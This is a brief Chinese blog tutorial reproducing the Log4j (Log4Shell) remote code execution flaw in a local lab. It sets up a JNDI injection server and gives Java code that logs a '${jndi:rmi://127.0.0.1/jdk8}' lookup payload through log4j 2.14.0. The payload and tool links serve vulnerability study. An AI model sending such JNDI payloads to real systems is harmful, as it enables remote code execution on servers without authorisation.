log4j远程代码执行漏洞复现-带源码简单包会

log4j远程代码执行漏洞复现-带源码简单包会,第1张

log4j远程代码执行漏洞复现-带源码简单包会

一、本地搭建JNDI注入服务(参考 https://github.com/welk1n/JNDI-Injection-Exploit.git),并启动

此类为1.8版本的需要远程执行的代码模块,可自定义

二、 创建maven项目引入log4j(2.14.0)

编写bug的入侵代码

public class Main {
    
    private static final Logger LOGGER = LogManager.getLogger();
    public static String bugStr1 = "${java:os}";
    public static String bugStr2 = "${java:vm}";
    public static String bugStr3 = "${jndi:rmi://127.0.0.1/jdk8}";

    public static void main(String[] args) throws Exception {
        

        LOGGER.error("Test log4j:{}", bugStr1);
        LOGGER.error("Test log4j:{}", bugStr2);
        LOGGER.error("Test log4j:{}", bugStr3);
        System.out.println("done");
    }
}

参考原理:

如何看懂Apache Log4j 远程代码执行漏洞原理?

https://github.com/welk1n/JNDI-Injection-Exploit.git

https://github.com/mbechler/marshalsec.git

https://github.com/apache/logging-log4j2.git

源码地址:

log4j远程漏洞复现源码.rar-网络攻防文档类资源-CSDN下载

                                -仅用于网络安全防护学习使用,遵纪守法,且不可顶风作案 @v@

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/5672532.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-16
下一篇 2022-12-17

发表评论

登录后才能评论

评论列表(0条)

保存